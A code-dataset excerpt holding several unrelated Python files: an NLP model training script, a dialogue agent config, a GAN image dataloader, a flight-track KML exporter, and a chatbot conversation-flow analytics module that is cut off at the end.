parser.add_argument(\"--do_eval\", action='store_true',\n help=\"Whether to run eval on the dev set.\")\n parser.add_argument(\"--do_predict\", action='store_true',\n help=\"Whether to run the model in inference mode on the test set.\")\n parser.add_argument(\"--do_lower_case\", action='store_true',\n help=\"Set this flag if you are using an uncased model.\")\n\n parser.add_argument(\"--per_gpu_train_batch_size\", default=8, type=int,\n help=\"Batch size per GPU/CPU for training.\")\n parser.add_argument(\"--per_gpu_eval_batch_size\", default=8, type=int,\n help=\"Batch size per GPU/CPU for evaluation.\")\n parser.add_argument(\"--learning_rate\", default=5e-5, type=float,\n help=\"The initial learning rate for Adam.\")\n parser.add_argument(\"--weight_decay\", default=0.0, type=float,\n help=\"Weight deay if we apply some.\")\n parser.add_argument(\"--adam_epsilon\", default=1e-6, type=float,\n help=\"Epsilon for Adam optimizer.\")\n parser.add_argument(\"--max_grad_norm\", default=1.0, type=float,\n help=\"Max gradient norm.\")\n parser.add_argument(\"--num_train_epochs\", default=3.0, type=float,\n help=\"Total number of training epochs to perform.\")\n parser.add_argument(\"--warmup_proportion\", default=0.1, type=float,\n help=\"Proportion of training to perform linear learning rate warmup for,E.g., 0.1 = 10% of training.\")\n\n parser.add_argument('--logging_steps', type=int, default=None,\n help=\"Log every X updates steps.\")\n parser.add_argument('--save_steps', type=int, default=None,\n help=\"Save checkpoint every X updates steps.\")\n parser.add_argument(\"--eval_checkpoints\", type=int, default=None,\n help=\"Evaluate specific checkpoints\")\n parser.add_argument(\"--eval_all_checkpoints\", action='store_true',\n help=\"Evaluate all checkpoints starting with the same prefix as model_name ending and ending with step number\")\n parser.add_argument('--overwrite_output_dir', action='store_true',\n help=\"Overwrite the content of the output directory\")\n parser.add_argument('--seed', type=int, default=42,\n help=\"random seed for initialization\")\n args = parser.parse_args()\n return args\n\n\ndef get_model_type(model_type):\n model_type = model_type.lower()\n if 'bert' in model_type or 'ernie' == model_type:\n return 'bert'\n if 'transformer' in model_type:\n return 'transformer'\n else:\n return 'else'\n\n\nif __name__ == '__main__':\n args = get_args()\n args.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n args.output_dir = os.path.join(args.output_dir, '{}'.format(args.model_type))\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n init_logger(log_file=os.path.join(args.output_dir, '{}-{}.log'.format(args.model_type, args.task_name)))\n if os.path.exists(args.output_dir) and os.listdir(\n args.output_dir) and args.do_train and not args.overwrite_output_dir:\n raise ValueError(\n \"Output directory ({}) already exists and is not empty. Use --overwrite_output_dir to overcome.\".format(\n args.output_dir))\n\n # Prepare GLUE task\n # args.task_name = args.task_name.lower()\n if args.task_name not in processors:\n raise ValueError(\"Task not found: %s\" % (args.task_name))\n args.processor = processors[args.task_name]()\n args.output_mode = output_modes[args.task_name]\n\n module = import_module('models.' + args.model_type)\n config = module.Config(args, finetuning_task=args.task_name)\n args.class_list = config.class_list\n\n if get_model_type(args.model_type) == 'bert':\n from train_eval_bert import load_and_cache_examples, train, evaluate\n else:\n from train_eval import load_and_cache_examples, train, evaluate\n if args.model_type == 'FastText':\n args.n_gram_vocab = config.n_gram_vocab\n\n # Training\n if args.do_train:\n if get_model_type(args.model_type) == 'bert':\n train_dataset = load_and_cache_examples(args, args.task_name, config.tokenizer, data_type='train')\n if train_dataset[0][5] is not None:\n config.n_num_feat = len(train_dataset[0][5])\n else:\n config.n_vocab, train_dataset = load_and_cache_examples(args, args.task_name, config.tokenizer, data_type='train')\n if train_dataset[0][5] is not None:\n config.n_num_feat = len(train_dataset[0][5])\n\n # model = module.Model(config).from_pretrained(args.model_name_or_path, config=config).to(args.device)\n model = module.Model.from_pretrained(args.model_name_or_path, config=config).to(args.device)\n global_step, tr_loss, best_steps = train(args, train_dataset, model, config.tokenizer)\n logger.info(\" global_step = %s, average loss = %s, best_step = %s\", global_step, tr_loss, best_steps)\n\n # Saving best-practices: if you use defaults names for the model, you can reload it using from_pretrained()\n logger.info(\"Saving model checkpoint to %s\", args.output_dir)\n # Save a trained model, configuration and tokenizer using `save_pretrained()`.\n # They can then be reloaded using `from_pretrained()`\n model_to_save = model.module if hasattr(model, 'module') else model\n model_to_save.save_pretrained(args.output_dir)\n # Good practice: save your training arguments together with the trained model\n torch.save(args, os.path.join(args.output_dir, 'training_args.bin'))\n\n # Evaluation\n results = []\n if args.do_eval or args.do_predict:\n if args.eval_checkpoints is not None:\n checkpoints = [(args.eval_checkpoints, os.path.join(args.output_dir, 'checkpoint-{}'.format(args.eval_checkpoints)))]\n elif args.eval_all_checkpoints:\n checkpoints = list(\n os.path.dirname(c) for c in sorted(glob.glob(args.output_dir + '/**/' + WEIGHTS_NAME, recursive=True)))\n checkpoints = [(int(checkpoint.split('-')[-1]), checkpoint)\n for checkpoint in checkpoints if checkpoint.find('checkpoint') != -1]\n checkpoints = sorted(checkpoints, key=lambda x: x[0])\n else:\n checkpoints = [(0, args.output_dir)]\n logger.info(\"Evaluate the following checkpoints: %s\", checkpoints)\n for _, checkpoint in checkpoints:\n global_step = checkpoint.split('/')[-1].split('-')[-1] if len(checkpoints) > 0 else \"\"\n prefix = checkpoint.split('/')[-1] if checkpoint.find('checkpoint') != -1 else \"\"\n\n # model = module.Model(config).from_pretrained(checkpoint)\n model = module.Model.from_pretrained(checkpoint)\n model.to(args.device)\n result = evaluate(args, model, config.tokenizer, global_step, prefix=prefix, data_type='dev' if args.do_eval else 'test')\n results.extend([(k + '_{}'.format(global_step), v) for k, v in result.items()])\n output_eval_file = os.path.join(args.output_dir, \"checkpoint_eval_results_{}.txt\".format('dev' if args.do_eval else 'test'))\n with open(output_eval_file, \"w\") as writer:\n for key, value in results:\n writer.write(\"%s = %s\\n\" % (key, str(value)))\n","repo_name":"VincentWong1/nlpLab","sub_path":"toolkits/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12747221804","text":"import json\n\n\nclass DialogConfig:\n def __init__(self, config_file_path=None):\n if config_file_path:\n with open(config_file_path, 'r') as f:\n config_json = json.load(f)\n else:\n config_json = None\n\n self.max_round_num = config_json['max_round_num'] if config_json else 0\n self.agent_request_slots = config_json['agent_request_slots'] if config_json else []\n self.agent_inform_slots = config_json['agent_inform_slots'] if config_json else []\n self.default_start_slot = config_json['default_start_slot'] if config_json else []\n self.no_query_slots = config_json['no_query_slots'] if config_json else []\n self.all_intents = config_json['all_intents'] if config_json else []\n self.agent_rule_requests = config_json['agent_rule_requests'] if config_json else []\n self.slot_name_translations = config_json['slot_name_translations'] if config_json else {}\n\n self.all_slots = sorted(list(set(self.agent_inform_slots + self.agent_request_slots)))\n\n # Possible actions for the agent\n self.feasible_agent_actions = [\n {'intent': 'done', 'inform_slots': {}, 'request_slots': []}, # Triggers closing of conversation\n {'intent': 'match_found', 'inform_slots': {}, 'request_slots': []} # Signals a found match for a ticket\n ]\n\n # Add inform slots\n for slot in self.agent_inform_slots:\n if slot != 'ticket':\n self.feasible_agent_actions.append({'intent': 'inform',\n 'inform_slots': {slot: \"PLACEHOLDER\"},\n 'request_slots': []})\n\n # Add request slots\n for slot in self.agent_request_slots:\n self.feasible_agent_actions.append({'intent': 'request',\n 'inform_slots': {},\n 'request_slots': [slot]})\n\n\ndef init_config(config_file_path):\n global config\n config = DialogConfig(config_file_path)\n\n\nconfig = DialogConfig()\n","repo_name":"alexander-zap/dialogue-agent","sub_path":"dialogue_agent/dialog_config.py","file_name":"dialog_config.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"36750931083","text":"# Want to load:\n# - Target image\n# - Source image embedding\n# = Target image embedding\n\nimport numpy as np\nimport pandas as pd\n\nimport torch\nimport torch.utils.data as data\nimport torchvision\nimport os\nfrom PIL import Image\n\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torchvision.datasets import ImageFolder\n\n# IMAGE_PATH = \"\"\n# transform = None\n# dataset = ImageFolder(IMAGE_PATH, transform)\n\nclass GAN_Dataset(data.Dataset):\n\n def __init__(self, dir, transform):\n super(GAN_Dataset, self).__init__()\n self.dir = dir\n self.transform = transform\n self.total_imgs = os.listdir(dir)\n\n self.img_paths = []\n img_path = self.dir + \"/\"\n img_list = os.listdir(dir)\n img_nums = len(img_list)\n for i in range(img_nums):\n img_name = img_path + img_list[i]\n self.img_paths.append(img_name)\n\n def __len__(self):\n return len(self.total_imgs)\n\n def __getitem__(self, idx):\n img_loc = os.path.join(self.dir, self.total_imgs[idx])\n image = Image.open(img_loc).convert('RGB')\n tensor_image = self.transform(image)\n\n name = self.img_paths[idx]\n print(name)\n return tensor_image\n\nclass ConcatDataset(torch.utils.data.Dataset):\n def __init__(self, *datasets):\n self.datasets = datasets\n\n def __getitem__(self, i):\n return tuple(d[i] for d in self.datasets)\n\n def __len__(self):\n return min(len(d) for d in self.datasets)\n\ndef dataloader(root_source = \"\\clean_dataset\\train_data\",\n root_target = \"\\clean_dataset\\train_data\",\n image_size = 224,\n num_channels = 3,\n batch_size = 4,\n num_workers = 6,\n shuffle = True):\n\n transform = transforms.Compose([\n transforms.ToTensor(),\n# transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)),\n transforms.Resize((image_size,image_size)),\n# transforms.RandomRotation(45),\n ])\n\n # image_data = GAN_Dataset(dir = root, transform = transform)\n # dataset = data.TensorDataset(image_data, image_data)\n # dataloader = data.DataLoader(image_data,\n # batch_size=batch_size,\n # shuffle=True,\n # num_workers=num_workers)\n \n # return zip(dataloader, dataloader)\n\n dataloader = data.DataLoader(\n ConcatDataset(\n GAN_Dataset(dir = root_source, transform = transform), \n GAN_Dataset(dir = root_target, transform = transform)\n ), batch_size=batch_size, shuffle=shuffle, num_workers=num_workers)\n\n return dataloader\n","repo_name":"ece324-2020/MirrorMe","sub_path":"GAN_DataLoader2.py","file_name":"GAN_DataLoader2.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9867692306","text":"import simplekml\nimport random\n\ncolor = simplekml.Color.chocolate\nalt_mode = simplekml.AltitudeMode.absolute\n\n\ndef make_random_color():\n r = random.randint(0, 255)\n g = random.randint(0, 255)\n b = random.randint(0, 255)\n c = simplekml.Color.rgb(r, g, b, 100)\n return c\n\n\ndef tuple2kml(kml, name, tracks, color):\n ls = kml.newlinestring(name=name)\n ls.coords = [(wpt[0], wpt[1], wpt[2]) for wpt in tracks]\n ls.extrude = 1\n ls.altitudemode = alt_mode\n ls.style.linestyle.width = 1\n ls.style.polystyle.color = color\n ls.style.linestyle.color = color\n\n\ndef place_mark(point, kml, name='test', hdg=None):\n pnt = kml.newpoint(name=name, coords=[point], altitudemode=alt_mode)\n pnt.style.labelstyle.scale = 0.25\n pnt.style.iconstyle.icon.href = '.\\\\placemark.png'\n # pnt.style.iconstyle.icon.href = '.\\\\plane.png'\n if hdg is not None:\n pnt.style.iconstyle.heading = (hdg + 270) % 360\n\n\ndef save_to_kml(tracks, save_path='agent_set'):\n kml = simplekml.Kml()\n\n for key, t in tracks.items():\n color = make_random_color()\n tuple2kml(kml, key, t, color)\n\n print(\"Save to \"+save_path+\".kml successfully!\")\n kml.save(save_path+'.kml')\n","repo_name":"Lydia-Yahuhe/cdr_mcts","sub_path":"fltsim/visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1636222434","text":"from collections import defaultdict\nimport pandas as pd\nimport numpy as np\nimport json\nimport conversation_analytics_toolkit as cat\n#from pandas.io.json import json_normalize\nfrom pandas import json_normalize\n\nclass _conversationPathAnalysis:\n def __init__(self, mode, on_column, max_depth, trim_reroutes, silent_mode=False):\n self.mode = mode\n self.on_column = on_column\n self.max_depth = max_depth\n self.trim_reroutes = trim_reroutes\n self.nodes_paths = defaultdict(list)\n self.warning_message = \"\"\n self.silent_mode = silent_mode\n\n def handle_node_row(self, path, row, step, is_conversation_start, path_length):\n if not path in self.nodes_paths:\n self.nodes_paths[path] = {\"flows\":0, \"rerouted\":0, \"dropped_off\":0, \"type\": \"NODE\", \"name\": row[self.on_column],\"is_conversation_start\": is_conversation_start, \"conversation_log_ids_dropped_off\":[], \"conversation_log_ids_rerouted\":[],\"path_length\": path_length}\n self.nodes_paths[path][\"flows\"] += 1\n #if (row.response_branch_exited==True and row.response_branch_exited_reason=='fallback' and row.digression is not True):\n if self.trim_reroutes == True:\n if (row.branch_exited==True and row.branch_exited_reason=='fallback' and row.digression is False):\n self.nodes_paths[path][\"rerouted\"] += 1\n self.nodes_paths[path][\"conversation_log_ids_rerouted\"].append((row.conversation_id, row.log_id))\n return 'rerouted'\n\n def handle_conversation_node_exit(self, path, step, row):\n self.nodes_paths[path][\"dropped_off\"] += 1\n self.nodes_paths[path][\"conversation_log_ids_dropped_off\"].append((row.conversation_id, row.log_id))\n\n def handle_conversation_path(self, df):\n # if data doesn't include digression, add it for downstream dependency.\n if 'digression' not in df.columns:\n df[\"digression\"] = False\n\n prev_node_path = \"\"\n prev_row = \"\"\n delimiter = \"\\\\\"\n for i, (index, row) in enumerate(df.iterrows()):\n node_code = row[self.on_column]\n node_id = str(node_code)\n if i==0:\n curr_node_path = node_id\n path_length = 0\n if self.handle_node_row(curr_node_path, row, i, True, path_length) == 'rerouted':\n # note this will never happen if trim_reroutes=False\n break\n else:\n curr_node_path = prev_node_path + delimiter + node_id\n path_length += 1\n if (i <= self.max_depth):\n if self.handle_node_row(curr_node_path, row, i, True, path_length) == 'rerouted':\n # note this will never happen if trim_reroutes=False\n break\n else:\n self.warning_message = \"reached depth limit of \" + str(i-1) + \", ignoring steps beyond. You can set max_depth to a larger number\"\n #print(\"reached depth limit of \" + str(i-1) + \", ignoring steps beyond. You can set max_depth to a larger number\")\n self.handle_conversation_node_exit(prev_node_path, i-1, row)\n break\n prev_node_path = curr_node_path\n prev_row = row\n if i == len(df) - 1:\n self.handle_conversation_node_exit(curr_node_path, i, row)\n\nclass DialogNodesGraph(): \n # compute visits in dialog nodes\n def __init__(self, workspace, description=\"\", silent_mode=False):\n self.steps = None\n df_workspace = json_normalize(workspace)\n # dataframe representation of the workspace\n self.dialog_nodes = df_workspace['dialog_nodes'].values[0]\n # compute map from node to its index in the dialog_nodes_array\n self.dialog_node_index = {}\n for i, element in enumerate(self.dialog_nodes):\n node_id = element[\"dialog_node\"]\n self.dialog_node_index[node_id] = i\n self.description = \"\"\n # count visits of nodes_visited in each node, prev, and next\n self.nodes_visited_graph = {}\n # map of conversations and their steps\n self.conversation_steps = {}\n self.silent_mode = silent_mode\n\n def _get_node(self, node_id):\n return self.dialog_nodes[self.dialog_node_index[node_id]]\n\n def _add_conversation_visits_to_graph(self, nodes_visited):\n for i, node in enumerate(nodes_visited):\n graph = self.nodes_visited_graph\n # add node if not exist\n if node not in graph:\n graph[node] = {'visits': 0, 'prev': {}, 'next': {}}\n # add count to current node\n graph[node]['visits'] += 1\n # add next to every node except last\n if i < len(nodes_visited) - 1:\n next_node = nodes_visited[i+1]\n if next_node not in graph[node]['next']:\n graph[node]['next'][next_node] = {'visits': 0}\n graph[node]['next'][next_node]['visits']+=1\n # add prev to every node except first\n if i > 0:\n prev_node = nodes_visited[i-1]\n if prev_node not in graph[node]['prev']:\n graph[node]['prev'][prev_node] = {'visits': 0}\n graph[node]['prev'][prev_node]['visits']+=1\n \n def _slider_update(self, slider, step, step_desc, step_message = None):\n if self.silent_mode == True:\n return\n width = 90\n prefix = \"\"\n long_message = prefix + step_desc + '.' * (width - len(step_desc) - len(prefix))\n slider.update(step)\n if step_message is not None:\n slider.write(step_message)\n slider.set_description(long_message)\n\n def compute_visits(self, logs):\n if not type(self.steps) == pd.core.frame.DataFrame:\n self.steps = logs\n else:\n self.steps = self.steps.append(logs)\n conversations_grouped = logs.groupby(\"conversation_id\")\n from tqdm import tqdm, tqdm_notebook\n if self.silent_mode == False:\n if cat.use_widgets():\n slider = tqdm_notebook(range(100), desc=\"processing {} conversations\".format(len(conversations_grouped)), ncols=900)\n else:\n slider = tqdm(range(100), desc=\"processing {} conversations\".format(len(conversations_grouped)), ncols=90)\n i=0\n for conversation, steps_df in conversations_grouped:\n i +=1\n if i/100 == int(i/100): # every 100 conversations update the slider\n step = int(100/len(conversations_grouped)*100)\n self._slider_update(slider, step, \"Processed {} of {} conversations\".format(i, len(conversations_grouped)))\n nodes_visited_in_conversation = []\n steps_df = steps_df.sort_values([\"response_timestamp\"])\n for index, row in steps_df.iterrows():\n nodes_visited_in_conversation.extend(row[\"nodes_visited\"]) \n self.conversation_steps[conversation] = nodes_visited_in_conversation\n self._add_conversation_visits_to_graph(nodes_visited_in_conversation)\n self._slider_update(slider, 100, \"Processed {} conversations\".format(i))\n\n def get_conversation_steps(self, conversation_id):\n return self.conversation_steps[conversation_id]\n\n def was_node_visited(self, node_id):\n return True if node_id in self.nodes_visited_graph else False\n\n def get_nodes_visited(self, node_id):\n return self.nodes_visited_graph[node_id]\n\n def get_node(self, node_id):\n return self._get_node(node_id)\n\n def get_node_label(self, node, show_type = True, show_id_if_title_exist = True, show_visits = True):\n node_type = node[\"type\"] if show_type == True else \"\"\n node_title = node[\"title\"] if \"title\" in node else \"\"\n node_id = node[\"dialog_node\"]\n if self.was_node_visited(node_id):\n node_visits = self.get_nodes_visited(node_id)[\"visits\"]\n else: \n node_visits = 0\n node_label = \"\"\n if show_type:\n node_label = \"[{}]\".format(node_type)\n if not show_id_if_title_exist and node_title != \"\":\n node_label = node_label + \" \" + node_title\n else: \n node_label = node_label + \" \" + node_title + \" : \" + node_id\n if show_visits == True:\n node_label = node_label + \" [ {} ]\".format(node_visits)\n return node_label\n\n def info(self):\n return {\n 'converstions': len(self.conversation_steps.keys()),\n 'steps': len(self.steps),\n 'nodes': len(self.nodes_visited_graph.keys())\n }\n\n def flows_to_from_node_sankey(self, node_id, arrangement=\"freeform\", orientation='h', pad=10, hovermode='x'):\n import plotly.graph_objects as go \n current_node_index = self.dialog_node_index[node_id]\n nodes_label = [self.get_node_label(n) for n in self.dialog_nodes]\n sankey_nodes = { \"label\": nodes_label, \"pad\": 10}\n #get links for the given node from the graph\n node_graph = self.get_nodes_visited(node_id)\n sankey_links = {\"source\": [], \"target\": [], \"value\": []}\n #iterate on prev\n for prev_node, prev_value in node_graph[\"prev\"].items():\n sankey_links[\"source\"].append(self.dialog_node_index[prev_node])\n sankey_links[\"target\"].append(current_node_index)\n sankey_links[\"value\"].append(prev_value[\"visits\"])\n for next_node, next_value in node_graph[\"next\"].items():\n sankey_links[\"source\"].append(current_node_index)\n sankey_links[\"target\"].append(self.dialog_node_index[next_node])\n sankey_links[\"value\"].append(next_value[\"visits\"])\n \n fig = go.Figure(go.Sankey(\n valuesuffix = \" visits\",\n orientation = orientation,\n arrangement = arrangement,\n node = {\n \"label\": sankey_nodes[\"label\"],\n 'pad':pad},\n link = {\n \"source\": sankey_links[\"source\"],\n\n \"target\": sankey_links[\"target\"],\n \"value\": sankey_links[\"value\"]}))\n fig.update_layout(title_text=\"Nodes visited for node: \" + node_id , font_size=10, hovermode = hovermode)\n fig.show()\n return \n\n def flows_to_from_node_html(self, node_id):\n node_graph = self.get_nodes_visited(node_id)\n prev_list = []\n for prev_node, prev_value in node_graph[\"prev\"].items():\n prev_list.append({\"prev_node\": prev_node, \"type\": self.get_node(node_id)[\"type\"], \"visits\": prev_value[\"visits\"]})\n prev_df = pd.DataFrame(prev_list)\n next_list = []\n for next_node, next_value in node_graph[\"next\"].items():\n next_list.append({\"next_node\": next_node, \"type\": self.get_node(node_id)[\"type\"], \"visits\": next_value[\"visits\"]})\n next_df = pd.DataFrame(next_list)\n from IPython.display import display, HTML\n display(HTML(prev_df.to_html()))\n display(HTML(next_df.to_html()))\n\nclass MilestoneFlowGraph: \n # data structures\n # { milestones: m1 --> {}}\n # { funnels: funnels --> [m1, m2]} \n # { mappings: node --> milestone}\n # compute visits in dialog nodes\n def __init__(self, workspace, silent_mode=False):\n #map of milestones\n self.milestones = {}\n #map of funnels, initialized default\n self.funnels = {\n \"default\": []\n }\n #nodes mapping to milestones\n self.nodes = {}\n df_workspace = json_normalize(workspace)\n self.dialog_nodes = df_workspace['dialog_nodes'].values[0]\n # compute map from node to its index in the dialog_nodes_array\n self.dialog_node_index = {}\n for i, element in enumerate(self.dialog_nodes):\n node_id = element[\"dialog_node\"]\n self.dialog_node_index[node_id] = i\n self.silent_mode = silent_mode\n\n def add_milestones(self, names, funnel=\"default\", atIndex=None):\n # add milestone, warn if already exists\n if atIndex==None:\n atIndex = len(self.funnels[funnel])\n for name in names:\n self.add_milestone(name, funnel, atIndex) \n atIndex+=1\n return\n\n def add_milestone(self, name, funnel=\"default\", atIndex=None):\n # add milestone, if not exist already\n if name in self.milestones:\n return\n #print(\"warning: milestone '{}' is already defined\".format(name))\n if atIndex==None:\n atIndex = len(self.funnels[funnel])\n self.funnels[funnel].insert(atIndex, name)\n self.milestones[name] = name\n return\n\n def add_node_to_milestone(self, dialog_node_id, milestone):\n # validate that node exists and milestone exists, warn if previous mapping exists\n if not dialog_node_id in self.dialog_node_index:\n print(\"Warning: dialog node '{}' does not exist in workspace\".format(dialog_node_id))\n if not milestone in self.milestones:\n print(\"Error: milestone is not defined. Use add_milestone() to add milestones\")\n return\n if dialog_node_id in self.nodes:\n print(\"Warning: dialog node '{}' is already defined for milestone '{}', overriding...\".format(dialog_node_id,self.nodes[dialog_node_id]))\n self.nodes[dialog_node_id] = milestone \n\n def get_funnel(self, funnel=\"default\"):\n if funnel not in self.funnels.keys():\n print(\"Error: funnel '{}' is not defined.\".format(funnel))\n return\n return self.funnels[funnel]\n\n def get_milestone_in_nodes_visited(self, nodes):\n result = None\n for node in nodes:\n if node in self.nodes.keys():\n result = self.nodes[node]\n break\n return result \n\n def enrich_milestones(self, df_logs):\n # take original data, for every nodes_visited, check if one has milestone def, enrich milestone\n # add column: milestone, funnels, \n df_logs['milestone'] = None\n slider = None\n conversations_grouped = df_logs.groupby(\"conversation_id\")\n \n from tqdm import tqdm, tqdm_notebook\n if self.silent_mode == False:\n if cat.use_widgets():\n slider = tqdm_notebook(range(100), desc=\"processing {} conversations\".format(len(conversations_grouped)), ncols=900)\n else:\n slider = tqdm(range(100), desc=\"processing {} conversations\".format(len(conversations_grouped)), ncols=900)\n i=0\n #for each conversation \n for conversation, steps_df in conversations_grouped:\n i +=1\n if i/100 == int(i/100): # every 100 conversations update the slider\n step = int(100/len(conversations_grouped)*100)\n self._slider_update(slider, step, \"Processed {} of {} conversations\".format(i, len(conversations_grouped))) \n #nodes_visited_in_conversation = []\n steps_df= steps_df.sort_values([\"response_timestamp\"])\n last_index = None\n #for each conversation step, update the milestone in the original data\n for index, row in steps_df.iterrows():\n last_index = index\n nodes_visited = row[\"nodes_visited\"]\n milestone = self.get_milestone_in_nodes_visited(nodes_visited)\n if milestone != None:\n df_logs.at[index, \"milestone\"] = milestone \n # if last step is not a milestone, add the Other node\n if df_logs.loc[last_index]['milestone'] == None:\n df_logs.at[index, \"milestone\"] = 'Other'\n #df_logs.loc[last_index]['milestone'] = 'Other'\n self._slider_update(slider, 100, \"Processed {} conversations\".format(i))\n \n def _slider_update(self, slider, step, step_desc, step_message = None):\n if self.silent_mode == True:\n return\n width = 90\n prefix = \"\"\n long_message = prefix + step_desc + '.' * (width - len(step_desc) - len(prefix))\n slider.update(step)\n if step_message is not None:\n slider.write(step_message)\n slider.set_description(long_message)\n \n\ndef compute_flows(df, config):\n \"\"\"\n DEPRECATED: compute aggregated flows across nodes and corresponding statistics, such as number of dropoffs\n returns results as a df for visualization\n \"\"\"\n print(\"Error. compute_flows is deprecated. Use aggregate_flows instead\")\n return\n # check optional config attributes\n if \"max_path_limit\" not in config:\n print (\"Warning, max_path_limit is missing from config. Default 20 is assumed\")\n config[\"max_path_limit\"] = 20\n\n # check mandatory dataframe fields\n # TODO: check additional mandatory fields , eg log_id\n mandatory_columns = ['conversation_id', 'node_visited', 'response_timestamp']\n for column in mandatory_columns:\n if column not in df.columns.values:\n raise Exception(\"input data is missing mandatory column: \" + column)\n\n analysis = _conversationPathAnalysis(config)\n for idx, conversation_df in df.groupby(df['conversation_id']):\n conversation_df = conversation_df.sort_values(\"response_timestamp\")\n analysis.handle_conversation_path(conversation_df)\n \n if len(analysis.warning_message) > 0:\n print(analysis.warning_message)\n df_node_out = pd.DataFrame.from_dict(analysis.nodes_paths, orient=\"index\")\n df_node_out.reset_index(inplace=True)\n df_node_out.rename(columns={'index':'path'}, inplace=True)\n\n return pd.concat([df_node_out])[['path','name','type','is_conversation_start','flows','rerouted','dropped_off','conversation_log_ids_rerouted','conversation_log_ids_dropped_off','path_length']]\n\ndef aggregate_flows(df, max_depth=30, mode=\"turn-based\", on_column=\"turn_label\", trim_reroutes=False, reverse=False, silent_mode=False):\n \"\"\"\n compute aggregated flows across nodes and corresponding statistics, such as number of dropoffs\n returns results as a df for visualization\n \"\"\"\n if mode not in [\"turn-based\", \"milestone-based\"]:\n print(\"invalid mode: {}. Valid values are either turn-based or milestone-based\".format(mode))\n return\n if on_column not in df.columns:\n print(\"invalid column name: {} does not exist in dataframe\".format(column))\n return\n\n # check mandatory dataframe fields\n # TODO: check additional mandatory fields , eg log_id\n mandatory_columns = ['log_id', 'conversation_id', 'response_timestamp']\n for column in mandatory_columns:\n if column not in df.columns.values:\n raise Exception(\"input data is missing mandatory column: \" + column)\n\n analysis = _conversationPathAnalysis(mode, on_column, max_depth, trim_reroutes, silent_mode)\n for idx, conversation_df in df.groupby(df['conversation_id']):\n conversation_df = conversation_df.sort_values(\"response_timestamp\", ascending=not reverse)\n analysis.handle_conversation_path(conversation_df)\n if len(analysis.warning_message) > 0:\n print(analysis.warning_message)\n df_node_out = pd.DataFrame.from_dict(analysis.nodes_paths, orient=\"index\")\n df_node_out.reset_index(inplace=True)\n df_node_out.rename(columns={'index':'path'}, inplace=True)\n\n return pd.concat([df_node_out])[['path','name','type','is_conversation_start','flows','rerouted','dropped_off','conversation_log_ids_rerouted','conversation_log_ids_dropped_off','path_length']]\n \n# def _find_consecutive_flow_states(df, column=\"milestone\"):\n# log_ids_to_delete = []\n# for idx, conversation_df in df.groupby(df['conversation_id']):\n# conversation_df = conversation_df.sort_values(\"response_timestamp\")\n# #for each conversation, remove duplicate milestones\n# last_milestone = None\n# for index, row in conversation_df.iterrows():\n# if row[column] != last_milestone:\n# last_milestone = row[column]\n# else:\n# log_ids_to_delete.append(row['log_id'])\n# return log_ids_to_delete\n\n\ndef merge_compare_flows(curr, last):\n def update_curr_rows(df, mask):\n #all fields in current exists, only update the previous\n df.loc[mask,'flows_prev'] = 0\n df.loc[mask,'rerouted_prev'] = 0\n df.loc[mask,'dropped_off_prev'] = 0 \n df.loc[mask,'flow_in_curr_only'] = True\n \n def update_prev_rows(df, mask):\n #copy fields from prev, set current flows to zeros \n df.loc[mask,'name'] = df[mask]['name_prev']\n df.loc[mask,'type'] = df[mask]['type_prev']\n df.loc[mask,'is_conversation_start'] = df[mask]['is_conversation_start_prev']\n df.loc[mask,'flows'] = 0\n df.loc[mask,'rerouted'] = 0\n df.loc[mask,'dropped_off'] = 0\n df['empty_arr'] = [[]] * len(df)\n df.loc[mask,'conversation_log_ids_rerouted'] = df[mask]['empty_arr']\n df.loc[mask,'conversation_log_ids_dropped_off'] = df[mask]['empty_arr']\n df.drop('empty_arr', axis='columns', inplace=True)\n df.loc[mask,'path_length'] = df[mask]['path_length_prev']\n df.loc[mask,'flow_in_prev_only'] = True\n \n #outer (union) join which merges on the path column\n merged = pd.DataFrame.merge(curr, last,\n on=['path'],\n how='outer', suffixes=('','_prev'))\n \n merged[\"flow_in_prev_only\"] = False\n merged[\"flow_in_curr_only\"] = False\n curr_rows_only_mask = (merged[\"name\"].notna() & merged[\"name_prev\"].isna())\n prev_rows_only_mask = (merged[\"name\"].isna() & merged[\"name_prev\"].notna())\n both_mask = (merged[\"name\"].notna() & merged[\"name_prev\"].notna())\n \n # handle each case\n update_curr_rows(merged, curr_rows_only_mask)\n update_prev_rows(merged, prev_rows_only_mask)\n \n # select the right fields to return\n columns = ['path', 'name', 'type', 'is_conversation_start', 'flows', 'rerouted',\n 'dropped_off', 'flows_prev', 'rerouted_prev',\n 'dropped_off_prev', 'conversation_log_ids_rerouted',\n 'conversation_log_ids_dropped_off', 'path_length', 'flow_in_curr_only', 'flow_in_prev_only']\n # reset the index\n merged.reset_index()\n print(\"Merging flows:\\nNew flows only in current period:(\",curr_rows_only_mask.sum(),\\\n \")\\nFlows in both periods:(\", both_mask.sum(),\\\n \")\\nOld flows not in current period:(\", prev_rows_only_mask.sum(),\")\")\n return merged[columns]\n\ndef simplify_flow_consecutive_milestones(df):\n \"\"\"\n remove consecutive milestones from the dataframe, to create a simplified flow visualization.\n \"\"\"\n\n # rows_to_delete = _find_consecutive_flow_states(df)\n # print(\"Removed {} duplicate milestone rows\".format(str(len(rows_to_delete))))\n # result = df[~df[\"log_id\"].isin(rows_to_delete)]\n\n return simplify_consecutive_duplicates(df, on_column=\"milestone\")\n\ndef _find_consecutive_duplicates(df, column=\"milestone\"):\n log_ids_to_delete = []\n for idx, conversation_df in df.groupby(df['conversation_id']):\n conversation_df = conversation_df.sort_values(\"response_timestamp\")\n #for each conversation, remove duplicate \n last_value = None\n for index, row in conversation_df.iterrows():\n if row[column] != last_value:\n last_value = row[column]\n else:\n log_ids_to_delete.append(row['log_id'])\n return log_ids_to_delete\n\ndef 